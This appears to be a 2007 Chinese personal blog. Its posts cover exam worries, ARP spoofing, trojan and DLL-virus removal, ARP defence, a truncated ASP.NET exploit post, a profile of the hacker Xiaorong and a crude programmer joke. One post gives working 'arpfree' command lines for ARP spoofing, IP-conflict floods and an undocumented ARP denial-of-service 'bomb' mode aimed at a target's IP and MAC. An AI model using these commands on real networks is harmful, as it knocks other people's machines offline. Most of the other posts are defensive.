希望改卷的老师可以人性化一D啊!!!甘样的话.我应该可以Past的.
其实.就系下午的试题比较难D咯,特别系第三题,睇到头都晕啊!!!计算年份的程序题,烦死,花的时间最多就系呢条题目...
7月26号,出榜啦!!!
应该会榜上有名怕...
呵呵!!!
( Mon, 21 May 2007 15:48:00 +0800 )
Description:
开始忘记说了，要使用ARP欺骗，必须启动ip路由功能，修改(添加)注册表选项：
　　 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
下面的朋友发现打开网卡失败，原因可能就是这个.
发送的时候可以选择ARP的TYPE。如果是ARP请求报文，则只要输入要问的IP地址
如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址
最后的发送速度可选参数为：（大小写敏感..我觉得挺不好的）
fast----------最快
hear---------每60MS一个包（可能是比较适合结合SNIFFER做***）
slowhear---每500MS一个包
auto---------每1秒一个包
slow---------每2秒个包
使用方法如下：
***********************************************************************
* (1)Send ar acket i "request mode" Examples: * arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast * | | | | | * your mac addre | | | | * destnatio mac | | eed * ar type | * | * your i addre ***********************************************************************
* (2)Send ar acket i "reply mode" Examples: * arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto * | | | | | | * your mac addre | | | | | * destnatio mac | | | eed * ar type | | * | | * your i addre | * | * the i addre of destnatio mac ***********************************************************************
补充：反击“LAN终结者”的办法：
反击“终结者”有几个办法：
1：发动比他更强烈的攻击：
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast | | 这里是你想攻击的人的IP地址
2：交换机竞争：
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast | | 这里是你想攻击的人的MAC地址
1:情况将导致他IP地址冲突（比“终结者”来的猛烈多了）
2：情况将使得他无法连接网络（由于交换机把他的流量都给你了）
———————————更-----新----消-----息—————————————————————
因为有朋友反映在非交换环境下，如使用HUB的情况下，无法对目标进行打击
故于2006年4月5日更新附件“arpfree.rar”
增加参数“bomb”，使用方法如下：
假设，目标为IP：192.168.237.109 目标mac为：011a8575a436
攻击命令如下：
arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 om 其实就是进行简单的ARP DOS攻击，快速刷新目标的ARP缓存，可以在消耗自身较少系统资源的情况下
造成和PDOS工具类似的效果，并且如果你不停止攻击，对方重启以后也无法正常进入系统
（当然前提是他没拔网线）。
其实这样做是十分不厚道的....所以参数就没有写在程序的 HELP 里面，大家慎用...
( Sat, 19 May 2007 11:38:58 +0800 )
Description:
2/系统WIN.INI文件内 在win.ini文件中，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动件。也许你会问了我是XP系统啊 怎么没有这个呢？不必担心给你个正确的你参考下就知道有没有可疑程序了。下边就是正常的WIN.INI(XP) for 16-bit a u ort
[fonts]
[exte io ]
[mci exte io ]
[files]
CMCDLLNAME32=mapi32.dll
CMCDLLNAME=mapi.dll
MAPIX=1
MAPIXVER=1.0.0.1
OLEMe aging=1
[MCI Exte io .BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo2
asx=MPEGVideo2
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo2
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo2
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo d=MPEGVideo
wax=MPEGVideo2
wm=MPEGVideo2
wma=MPEGVideo2
wmv=MPEGVideo2
wmx=MPEGVideo2
wvx=MPEGVideo2
wpl=MPEGVideo 3/SYSTEM.INI文件中 在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe 程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。 又会有人问了 我是XP系统怎么又不一样呢？在给你个正常的XP系统的SYSTEM.INI请大家可以参考下 正常的SYSTEM.INI文件 for 16-bit a u ort
[drivers]
wave=mmdrv.dll
timer=timer.drv
[driver32]
[386enh]
woafont=a 936.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON 4/在config.sys内 这类加载方式比较少见 ,但是并不是没有,如果上述方法都找不到的话,请来这里也许会有收获的。 5/在autuexec.bat内 这类加载方式也是比较少见,建议跟config.sys方法一样。 4 和5 的加载方式建议大家先必须确定计算机有病毒后在 并且上边的方法都找不到后，最后来这里进行查找。 总结：这类病毒是比较容易暴露的，建议手动删除时最好进入安全模式下，因为安全模式只运行WINDOWS必备的系统进程，EXE型病毒很容易暴露出来的，下边附上一张WINDOWS安全模式的 必须进程表
sm .exe Se io Manager csr .exe 子系统服务器进程 winlogon.exe 管理用户登录 services.exe 包含很多系统服务 lsa .exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。(系统服务) 产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务) -> etlogo svchost.exe 包含很多系统服务 !!!-eventsystem,(SPOOLSV.EXE 将文件加载到内存中以便迟后打印。) explorer.exe 资源管理器 (internat.exe 托盘区的拼音图标) system
System Idle Proce 这个进程是不可以从任务管理器中关掉的。这个进程是作为单线程运行在每个处理器上，并在系统不处理其他线程的时候分派处理器时间
taskmagr.exe 就是任务管理器了
二DLL型后缀病毒 这类病毒大多是后门病毒，这类病毒一般不会把自己暴露在进程中的，所以说特别隐蔽，比较不好发现。启动DLL后门的载体EXE是不可缺少的，也是非常重要的，它被称为：Loader。如果没有Loader，那DLL后门如何启动呢？因此，一个好的DLL后门会尽力保护自己的Loader不被查杀。Loader的方式有很多，可以是为我们的DLL后门而专门编写的一个EXE文件；也可以是系统自带的Rundll32.exe和Svchost.exe，即使停止了Rundll32.exe和Svchost.exeDLL后门的主体还是存在的。现在大家也许对DLL有了个初步的了解了，但是不是后缀是DLL就是病毒哦，也不要因为系统有过多的Rundll32.exe和Svchost.exe进程而担心，因为他们不一定就是病毒，所以说这个病毒比较隐蔽，下边来介绍几种判别办法
1/Svchost.exe的键值是在“HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Svchost”每个键值表示一个独立的Svchost.exe组。微软还为我们提供了一种察看系统正在运行在Svchost.exe列表中的服务的方法。以Window XP为例：在“运行”中输入：cmd，然后在命令行模式中输入：tasklist /svc。如果使用的是Window 2000系统则把前面的“tasklist /svc”命令替换为：“tlist -s”即可。如果你怀疑计算机有可能被病毒感染，Svchost.exe的服务出现异常的话通过搜索 Svchost.exe文件就可以发现异常情况。一般只会找到一个在：“C:\Windows\System32”目录下的Svchost.exe程序。如果你在其他目录下发现Svchost.exe程序的话，那很可能就是中毒了。 2/还有一种确认Svchost.exe是否中毒的方法是在任务管理器中察看进程的执行路径。但是由于在Windows系统自带的任务管理器不能察看进程路径，所以要使用第三方的进程察看工具。比如Windows优化大师中的Window 进程管理 2.5。这样，可以发现进程到底调用了什么DLL文件.
3/普通后门连接需要打开特定的端口，DLL后门也不例外，不管它怎么隐藏，连接的时候都需要打开端口。我们可以用netstat –an来查看所有TCP/UDP端口的连接，以发现非法连接。大家平时要对自己打开的端口心中有数，并对netstat –an中的state属性有所了解。当然，也可以使用Fport来显示端口对应的进程，这样，系统有什么不明的连接和端口，都可以尽收眼底。 4/最关键的方法对比法。***好系统和所有的应用程序之后，备份system32目录下的EXE和DLL文件：打开CMD，来到WINNTsystem32目录下，执行：dir *.exeexe.txt dir *.dlldll.txt，这样，就会把所有的EXE和DLL文件备份到exe.txt和dll.txt文件中；日后，如发现异常，可以使用相同的命令再次备份EXE和DLL文件(这里我们假设是exe0.txt和dll0.txt)，并使用：fc exe.txt exe0.txtexedll.txt fc dll.txt dll0.txtexedll.txt，其意思为使用FC命令比较两次的EXE文件和DLL文件，并将比较结果保存到exedll.txt文件中。通过这种方法，我们就可以发现多出来的EXE和DLL文件，并通过文件大小，创建时间来判断是否是DLL后门。
DLL型病毒的清除
1/ 在确定DLL病毒的文件的话请尝试下边方法
移除方法： 1. 开始——运行——输入"Regedit" 2. 搜索"*.dll" 3. 删除搜索到的键值。 4. 重启
5. 转到C:\Windows\System32\ 6. 删除*.dll 2/到注册表下列地方寻找DLL的踪迹
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/WindowsNT/Currentversion/ Svchost
3/如果上边的地方都找不到的话建议使用优化大势进程显示工具 对 RUNDLL32.EXE和SVCHOST.EXE里边运行的DLL程序进行核实找到病毒文件对其进行结束 然后在对他进行删除 建议使用第1种方法是非常有效的
三＄NtUni tallQxxxxxxx＄（x代表数字）型病毒 这个属于恶意脚本文件病毒。C盘下生成文件夹：＄NtUni tallQxxxxxxx＄（x代表数字） 冒充微软更新补丁的卸载文件夹，并且在Win2000/XP下拥有系统文件级隐藏属性。下边说下清楚方法 注册表手动删除启动项
参考：
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Ru HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Ru 删除：regedit - C:\＄NtUni tallQxxxxxxx＄\WINSYS.cer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 删除：Sys32，值为：C:\＄NtUni tallQxxxxxxx＄\WINSYS.v HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru 删除：Sys32，值为：regedit - C:\＄NtUni tallQxxxxxxx＄\WINSYS.cer 删除：internat.exe，值为：internat.exe 删除整个＄NtUni tallQxxxxxxx＄ 目录
补充说明： 系统文件夹（\WINNT或\Windows）下出现的如＄NtUni tallQ823980＄ 、＄NtUni tallQ814033＄ 这类文件夹是Window Update 或***微软补丁程序留下的卸载信息，用来卸载已***的补丁，按补丁的编号如Q823980、Q814033 可以在微软的网站查到相应的说明。请注意与恶意代码建立的文件夹区分。
四 压缩文件杀毒工具对其不能删除 这类病毒大多是在IE临时文件里的，请对临时文件进行清除即可清楚此类病毒，建议定时清理IE临时文件。
( Sat, 19 May 2007 11:38:21 +0800 )
Description:
很多人说病毒清除掉后留下很多尸体文件，虽然可以删除，但是他们无处不在，一个个干掉实在是太麻烦了。 比如viking留下的_desktop.ini；比如欢乐时光留下的desktop.ini、folder.htt；还比如病毒经常在你的硬盘跟目录下放上属性为系统+隐藏的autorun.inf，以及这个文件里run=字段后面的程序，数不胜数…… 那么如何来干掉这些垃圾？实际上你可以利用搜索功能从“我的电脑”范围内将这些垃圾搜索出来，然后CTRL+A全选，DEL删除！当然要记得搜索时在“更多高级选项”里把“搜索隐藏的文件和文件夹”和“搜索系统文件夹”两这个地方勾上，否则毛也搜不到！ 以上是一个方法，但是下面这个方法会让你更爽，因为你不但要干掉这些该死的病毒，还能从中学会一些东西，能感受的到那些该死的文件被喀嚓的快感……那么还等什么，我们开始吧！ 你将会看到一个批处理程序，基本上由DEL和FOR两个命令组成。基本框架和原理是很简单的：用FOR来循环所有的驱动器和目录，用DEL来删除目标文件。先看一下代码： FOR %%I IN (c:,d:,e DO CD /D %%I FOR %% J IN (filename1, filename2, filename3) DO DEL %%J /A HS /F /S ECHO 目标文件删除完毕，按任意键退出 PAUSE 代码说明： 所有大写部分都是程序中不可修改的代码，红色和蓝色部分是可以修改的。 红色部分请修改成你当前的盘符，有多少个就写进去多少个，格式照猫画虎即可(注意，盘符后面要跟英文冒号，每个盘之间要用英文逗号隔开)。蓝色部分请修改成要删除的目标文件，必须带扩展名(如autorun.inf)，而且用英文逗号隔开，如果只有一个文件就不用写逗号了。请注意：因为执行的程序是删除，请务必确保你写的目标文件就是你要删除的病毒尸体，如果你写成别的文件而被删了，可别来找偶！ 将代码保存为一个扩展名为bat或者cmd的批处理文件，然后双击执行，你就会看到那些该死的病毒尸体在屏幕上一闪而过，再也找不到踪影了！ 给个具体的例子，比如你的硬盘有C、D、E、F四个盘，你中了viking(威金)，病毒清除完后在每个文件夹下都留下一个_desktop.ini文件(什么，你没看到？因为人家是隐藏的)，这个玩意怎么用我们的程序来删除？代码如下： FOR %%I IN (c:,d:,e:,f DO CD /D %%I FOR %%J IN (_desktop.ini) DO DEL %%J /A HS /F /S
ECHO 目标文件删除完毕，按任意键退出
PAUSE 如果你的硬盘里没有这些尸体文件，但又想测试一下效果，可以自己建一些目录，在里面随意放上些文件，把红色部分修改为你建的目录，把蓝色部分修改为你放的文件，保存、运行即可，你会发现那些文件都消失了。所以如果你想批量删除某些文件的时候就可以用到这个脚本。其他演化方式，大家八仙过海去吧！ 还是那句话，对付病毒，锻炼手工能力才是真的，杀毒软件都是很弱智的，要不为什么不把病毒尸体给你处理干净呢？我们自己动手，丰衣足食！ ( Sun, 13 May 2007 09:56:53 +0800 )
Description: 近日，“代尔夫”恶性蠕虫病毒正在多个企业的局域网中肆虐。昨天，瑞星全球反病毒检测网发布的预警指出，该病毒会在局域网发动ARP攻击，造成局域网内其他计算机上网时自动下载病毒并执行，严重时甚至造成整个局域网瘫痪。
　　据瑞星反病毒专家介绍，“代尔夫”病毒运行之后，会自动从网站上下载其他盗号木马，窃取用户的隐私文件。同时，该病毒还会下载WinPcap等工具软件来对局域网发动ARP攻击，使其他用户在浏览网页时自动加入一个名为hxxp://4255.biz恶意网址。用户的计算机访问该网址后会自动下载病毒并运行。
( Wed, 9 May 2007 11:26:41 +0800 )
Description:
要了解ARP欺骗攻击, 我们首先要了解ARP协议以及它的工作原理，以更好的来防范和排除ARP攻击的带来的危害。本文为大家带来进阶的ARP攻击防制方法。 　　基本ARP介绍 　　ARP “Addre Resolutio Protocol”（地址解析协议），局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的顺利进行。 　　ARP协议的工作原理：在每台***有TCP/IP协议的电脑里都有一个ARP缓存表，表里的IP地址与MAC地址是一一对应的，如表所示。 　　我们以主机A（192.168.1.5）向主机B（192.168.1.1）发送数据为例。当发送数据时，主机A会在自己的ARP缓存表中寻找是否有目标IP地址。如果找到了，也就知道了目标MAC地址，直接把目标MAC地址写入帧里面发送就可以了；如果在ARP缓存表中没有找到相对应的IP地址，主机A就会在网络上发送一个广播，目标MAC地址是“FF.FF.FF.FF.FF.FF”，这表示向同一网段内的所有主机发出这样的询问：“192.168.1.1的MAC地址是什么？”网络上其它主机并不响应ARP询问，只有主机B接收到这个帧时，才向主机A做出这样的回应：“192.168.1.1的MAC地址是00-aa-00-62-c6-09。”这样，主机A就知道了主机B的MAC地址，它就可以向主机B发送信息了。同时它还更新了自己的ARP缓存表。 基本ARP病毒防制法 　　通过对 ARP工作原理得知，如果系统ARP缓存表被修改不停的通知路由器一系列错误的内网IP或者干脆伪造一个假的网关进行欺骗的话，网络就肯定会出现大面积的掉线问题，这样的情况就是典型的 ARP攻击，对遭受ARP攻击的判断，其方法很容易，你找到出现问题的电脑点开始运行进入系统的DOS操作。ping路由器的LAN IP丢包情况。输入ping 192.168.1.1（网关IP地址），如下图： 　　
图片一 　　内网ping路由器的LAN IP丢几个包，然后又连上，这很有可能是中了ARP攻击。为了进一步确认，我们可以通过查找ARP表来判断。输入ARP -a命令，显示如下图： 　　
图片二 　　可以看出192.168.1.1地址和192.168.252地址的IP的 MAC地址都是00-0f-3d-83-74-28,很显然，这就是 ARP欺骗造成的。 在理解了ARP之后，ARP欺骗攻击以及如何判断此类攻击，我们简单介绍一下如何找到行之有效的防制办法来防止这类攻击对网络造成的危害。　Qno侠诺工程师的一般处理办法分三个步骤来完成。 1、激活防止ARP病毒攻击 　　进入路由器的防火的基本配置栏将“防止ARP病毒攻击”在这一行的“激活”并确定。 2、对每台pc上绑定网关的IP和其MAC地址 　　在每台PC机上进入dos操作，输入ar – 192.168.1.1(网关IP) 00-0f-3d-83-74-28(网关MAC),Enter后完成每台PC机的绑定。 　　针对网络内的其它主机用同样的方法输入相应的主机IP以及MAC地址完成IP与MAC绑定。但是此动作，如果重起了电脑，作用就会消失，所以可以把此命令做成一个批处理文件，放在操作系统的启动里面，批处理文件可以这样写： 　　@echo off 　　ar -d 　　ar -s路由器LAN IP 路由器LAN MAC 3、在路由器端绑定用户IP/MAC地址： 　　在DHCP功能中对IP/MAC进行绑定，Qno路由器提供了一个显示新加入的IP地址的功能，通过这个功能可以一次查找到网络内部的所有PC机的IP/MAC的对应列表，我们可以通过“√”选的功能选择绑定IP/MAC。 进阶ARP病毒防制 　　单靠这样的操作基本可以解决问题，但是Qno侠诺的技术工程师建议通过进一步通过一些手段来进一步控制ARP的攻击。 1、病毒源，对病毒源头的机器进行处理，杀毒或重新装系统。此操作比较重要，解决了ARP攻击的源头PC机的问题，可以保证内网免受攻击。 2、网吧管理员检查局域网病毒，***杀毒软件（金山毒霸/瑞星，必须要更新病毒代码），对机器进行病毒扫描。 3、给系统***补丁程序，通过Window Update***好系统补丁程序(关键更新、安全更新和Service Pack)。 4、给系统管理员帐户设置足够复杂的强密码，最好能是12位以上，字母+数字+符号的组合；也可以禁用/删除一些不使用的帐户。 5、经常更新杀毒软件（病毒库），设置允许的可设置为每天定时自动更新。***并使用网络防火墙软件，网络防火墙在防病毒过程中也可以起到至关重要的作用，能有效地阻挡自来网络的攻击和病毒的入侵。部分盗版Windows用户不能正常***补丁，不妨通过使用网络防火墙等其它方法来做到一定的防护。 6、关闭一些不需要的服务，条件允许的可关闭一些没有必要的共享，也包括C＄、D＄等管理共享。完全单机的用户也可直接关闭Server服务。 7、不要随便点击打开QQ、MSN等聊天工具上发来的链接信息，不要随便打开或运行陌生、可疑文件和程序，如邮件中的陌生附件，外挂程序等。 　　ARP攻击防制是一个任重而道远的过程，必须高度重视这个问题，而且不能大意马虎，我们可以采取以上Qno侠诺技术工程师的建议随时警惕ARP攻击，以减少受到的危害，提高工作效率，降低经济损失。 ( Wed, 9 May 2007 11:23:54 +0800 )
Description:
这个漏洞有点稀奇古怪。
呵呵。不过国内好象一直没有人提起过。
这都是05年的漏洞了。我去年就拿到资料了。
不过。没有日到几个站。
好象都打过补丁了。可惜。。发现晚了。
先看ms给的公告吧 路径验证漏洞 - CAN-2004-0847。 ASP.NET 中存在规范漏洞，攻击者可利用此漏洞绕过 ASP.NET 网站的安全检查并且进行未经授权的访问。 成功利用此漏洞的攻击者可以执行多种操作，这取决于网站的具体内容。
说下利用方法：
比如现在www.444.com
这个站为目标站。所以使用的脚本语言是a .net
经过NBSI的扫描之后.
该站后台路径为
( Sat, 5 May 2007 23:21:26 +0800 )
Description: 小学的同学开店啦...555,睇来生系一个比较有钱的屋企就系吾同啊...我中要靠自己的努力来稳饭吃啊...嗯.睇来.
我要更加甘努力学也先得啦...5月26号...好快...程序员考试...等我...中有..呢几日都好郁闷啊...同我关系吾错的一
个人得了癌症,天啊...她才17岁啊..希望.可以快D,好翻咯...
( Sun, 22 Apr 2007 22:27:30 +0800 )
Description:
网名：小榕
性别：男
年纪：31
婚姻：已婚
资力：中国CAD/CAM协会会员，高级程序员
格言：无论在现实或是网络中，我都是孤独的.......
黑客原则：不能仇视社会，不能给别人制造麻烦，不能给别人带来损失。有人对黑客这样评价：黑客是一种不断研究不断探索的境界。
个人站点：netxeyes.org
============================================================
　　无可否认，小榕永远是中国黑客/安全界的骄傲！
　　小榕，1972年出生，据小榕自己说，他从小就是一个性格调皮的家伙，看看他的自我介绍：
　　小学三年级因倒卖指南针(我一毛钱买进，一块钱卖出)，被学校警告。
　　小学六年级给同班女同学写情书，未果。
　　初一曾经在夜里披着草席爬进公厕(男厕),把一个正在出恭的老头吓得失足....
　　初二第一次约女同学看电影《斯巴达克斯》,中途被告知“恐怖”女同学提前退场，我一个人坚持看完了电影。
　　初二加入了中国篆刻家协会。
　　初三因为拆自行车零件(别人的)被派出所护送回家。
　　高一和小混混一块寻衅滋事被街道派出所传唤一次，也是在那个时候学会了吸烟。
　　进入了一所树没草高、男比女多的工科大学。
　　大一上学期高等数学上册补考一次。
　　大一下学期高等数学上册再补考一次。
　　大一下学期普通物理补考一次。
　　毕业前普通物理再补考一次。
　　加入了中国CAD/CAM协会。
　　最后以“排名30名，本班共31人”(《毕业推荐书》上的原话)的成绩毕业。
　　1996年第一次上网。
　　1997年春节第一次破解了别人的帐号
　　1997年夏天和别人打架，脸上留下了永远的痕迹
　　1998年通过了高级程序员水平考试
　　1999年开始写扫描/破解类软件
　　至今还在哭泣...
===========================================================
小榕说，“通往电脑的道路不只一条，就看你怎么走”。 “只要我敲键盘的速度足够快，可以一天黑掉100个网站”小榕曾经在一个月里进入1000家网站，并找出其中的漏洞。小榕的名字在网上非常响亮，这倒不是因为他黑过谁，而是因为他发布了许多杀伤力巨大而又及易上手Hack工具。小榕轻易不出刀，他只负责提供刀具。
　　呵呵，但不管怎么说，小榕无庸质疑的是国内目前的顶级黑客，他开发的流光软件是众多小“黑客”必用的软件之一。
　　父亲（已去世）是大学教授的小榕，对黑客的道德观认识得很清楚：黑客像美国西部开发时的牛仔，没有法律的约束，但却有自己的做事准则。黑客要有道德底线，小榕的三条做黑客原则：不能仇视社会，不能给别人制造麻烦，不能给别人带来损失。有人对黑客这样评价：黑客是一种不断研究不断探索的境界。
**备注**：大家还记得美国轰炸我国驻南斯拉夫大使馆吧？一些爱国人士不堪屈辱，便引起了中美在互联网上的“红黑大战”，红方也就是我方，带头大哥就是小榕！！
============================================================
小 榕 姓名 小榕 性别 男 出生年月 1972年生 　
1995年大学毕业，高级程序员，已婚。
毕业后在一个乱七八糟的房地产公司，无产者,道不同，不予相谋。
最怀念的事 ：10年前的初恋
最怀念的人 ：我深爱的父亲，在天国里的父亲
最爱的.... ：小鸟（Naive Bird），只有她始终支持着我
最憎恨的.. ：水，尤其是一潭死水
准则...... ：我不是黑客，因为我喜欢一切美好的东西，但是如果
有什么破坏了这美好....A ault!
无论在现实或是网络中，我都是孤独的.......
小 鸟
姓名 小鸟 性别 女 出生年月 1976年生 　
小榕的财务主管，小榕的另一半。
最怀念的事 与小榕的初次相遇，和小榕在一起时的每一次心跳
最爱的.... 小榕（Bu y）
( Wed, 18 Apr 2007 18:11:37 +0800 )
Description:
1、都是靠出卖为生。 2、吃青春饭，人老珠黄肯定混不下去。 3、越高级收入越高，当然中间人的抽头会更高。
4、生活没有规律。以夜生活为主，如果需要，凌晨也要加班。 5、名声越大，越容易受到青睐。 6、必须尽最大可能满足客户各种各样非正常的需求。
7、鼓励创新精神。 8、喜欢扎堆。程序员集中的地方称为软件园，***集中的地方叫红灯区。
9、流动性较大，正常情况下没有工会。 10、如果怀孕了，既不能做程序员，也不能做***。 11、都为防病毒的问题而烦恼... 12、当然, 个中高手还专门以制毒传毒为乐。 13、一个是Microsoft，一个是Plug Play。 14、工作状态相同。工作时精神高度集中，最怕外界干扰。工作完毕身心放松 ，体会到一种不可替代的工作快乐。 15、女孩子最好还是不要做这两个职业，但还是有很多女孩子做。 16、除非在转行以后，否则都不愿意结婚......没空儿啊。 17、程序员怕查户口的。***怕查房的。 18、***工作的地方(床)是程序员最向往的地方。 19、程序界的高手通常很讨厌微软，***界的高手嗯...这个...恐怕也如此。 20、都是吃青春饭，不过到人老珠黄后，凭着混个脸熟，程序员可以混个管理 员，***也行，不过俗称老鸨。 21、***靠的本钱是三围，程序员靠的可是四围(思维)。 22、程序员为了拉客，通常会在交易前提供一个DEMO，***提供的那叫PHOTO。 23、程序员现在出的活时兴叫吃霸、结霸，***大姐一律叫波霸。 24、心不在焉的***可以一边工作一边do { eep(1) leep(9) } until overflow。心不在焉的程序员也可以一边工作一边navigate到***网站上 去。 25、程序员手册：一套好的人机操作界面要求，对于新手，能够一步一步的引 导他进入功能，相反对于熟客，能够直奔主题；***同样要遵守程序员手 册对人鸡界面的规定。 26、***在工作中最怕的是临检，程序员最怕的是停电。 27、新上手的程序员叫菜鸟，刚入行的***叫雏鸡，都是好可怜的小动物。 28、程序界现在流行OO的方法，虽然在XXXX年前***已在床上掌握了O～O～～ ～的技术。 29、程序员为了拉客，无奈之时，也可以先让客人试玩，***当然有时也会先 给你点甜头。 不过总之程序员比***还惨，
补充如下： 1、***每个月总有几天可以理直气壮的说不，程序员如果老板不发话，可要 一年干到黑。 2、女人做程序那叫奇女、才女，男人要是做妓，那就叫鸭了。 3、***不干了人家那叫从良，程序员如果不干了，估计是下了岗。 4、程序员有千年虫问题，***好象没听说有。 5、***的工作隐蔽性很强，程序员的工作只怕亲戚朋友都知道，所以更加没脸皮。 6、程序员做的越好，要做的程序越多，***做的好，就可以挑三拣四。 7、程序员现在流行FREE、OPEN什么的，说白了就是自己玩自己，***界好象 还没这样恶性竞争。 ( Wed, 4 Apr 2007 09:02:54 +0800 )
Description:
灰鸽子官方声明：
　　灰鸽子工作室于2003年初成立,定位于远程控制、远程管理、远程监控软件开发，主要产品为灰鸽子远程控制系列软件产品。灰鸽子工作室的软件产品，均为商业化的远程控制软件，主要提供给网吧、企业及个人用户进行电脑软件管理使用；灰鸽子软件已获得国家颁布的计算机软件著作权登记***，受著作权法保护。 然而，我们痛心的看到，目前互联网上出现了利用灰鸽子远程管理软件以及恶意破解和篡改灰鸽子远程管理软件为工具的不法行为，这些行为严重影响了灰鸽子远程管理软件的声誉，同时也扰乱了网络秩序。这完全违背了灰鸽子工作室的宗旨和开发灰鸽子远程管理软件的初衷。在此我们呼吁、劝告那些利用远程控制技术进行非法行为的不法分子应立即停止此类非法活动。 应该表明的是，灰鸽子工作室自成立以来恪守国家法律和有关网络管理的规定，具有高度的社会责任感。为有效制止不法分子非法利用灰鸽子远程管理软件从事危害社会的非法活动，在此，我们郑重声明，自即日起决定全面停止对灰鸽子远程管理软件的开发、更新和注册，以实际行动和坚定的态度来抵制这种非法利用灰鸽子远程管理软件的不法行为，并诚恳接受广大网民的监督。 灰鸽子工作室谴责那些非法利用远程控制技术实现非法目的的行为，对于此类行为，灰鸽子工作室发布了灰鸽子服务端卸载程序，以便于广大网民方便卸载那些被非法***于自己计算机的灰鸽子服务端。
( Wed, 4 Apr 2007 08:53:15 +0800 )
Description:
【故障原理】
要了解故障原理，我们先来了解一下ARP协议。
在局域网中，通过ARP协议来完成IP地址转换为第二层物理地址（即MAC地址）的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞。
ARP协议是“Addre Resolutio Protocol”（地址解析协议）的缩写。在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢？它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的顺利进行。
每台***有TCP/IP协议的电脑里都有一个ARP缓存表，表里的IP地址与MAC地址是一一对应的，如下表所示。
主机 IP地址 MAC地址 A 192.168.16.1 aa-aa-aa-aa-aa-aa B 192.168.16.2 - - - - - C 192.168.16.3 cc-cc-cc-cc-cc-cc D 192.168.16.4 dd-dd-dd-dd-dd-dd 我们以主机A（192.168.16.1）向主机B（192.168.16.2）发送数据为例。当发送数据时，主机A会在自己的ARP缓存表中寻找是否有目标IP地址。如果找到了，也就知道了目标MAC地址，直接把目标MAC地址写入帧里面发送就可以了；如果在ARP缓存表中没有找到相对应的IP地址，主机A就会在网络上发送一个广播，目标MAC地址是“FF.FF.FF.FF.FF.FF”，这表示向同一网段内的所有主机发出这样的询问：“192.168.16.2的MAC地址是什么？”网络上其他主机并不响应ARP询问，只有主机B接收到这个帧时，才向主机A做出这样的回应：“192.168.16.2的MAC地址是 - - - - - ”。这样，主机A就知道了主机B的MAC地址，它就可以向主机B发送信息了。同时它还更新了自己的ARP缓存表，下次再向主机B发送信息时，直接从ARP缓存表里查找就可以了。ARP缓存表采用了老化机制，在一段时间内如果表中的某一行没有使用，就会被删除，这样可以大大减少ARP缓存表的长度，加快查询速度。
从上面可以看出，ARP协议的基础就是信任局域网内所有的人，那么就很容易实现在以太网上的ARP欺骗。对目标A进行欺骗，A去Ping主机C却发送到了DD-DD-DD-DD-DD-DD这个地址上。如果进行欺骗的时候，把C的MAC地址骗为DD-DD-DD-DD-DD-DD，于是A发送到C上的数据包都变成发送给D的了。这不正好是D能够接收到A发送的数据包了么，嗅探成功。
A对这个变化一点都没有意识到，但是接下来的事情就让A产生了怀疑。因为A和C连接不上了。D对接收到A发送给C的数据包可没有转交给C。
做“ma i the middle”，进行ARP重定向。打开D的IP转发功能，A发送过来的数据包，转发给C，好比一个路由器一样。不过，假如D发送ICMP重定向的话就中断了整个计划。
D直接进行整个包的修改转发，捕获到A发送给C的数据包，全部进行修改后再转发给C，而C接收到的数据包完全认为是从A发送来的。不过，C发送的数据包又直接传递给A，倘若再次进行对C的ARP欺骗。现在D就完全成为A与C的中间桥梁了，对于A和C之间的通讯就可以了如指掌了。
【故障现象】
当局域网内某台主机运行ARP欺骗的木马程序时，会欺骗局域网内所有主机和路由器，让所有上网的流量必须经过病毒主机。其他用户原来直接通过路由器上网现在转由通过病毒主机上网，切换的时候用户会断一次线。
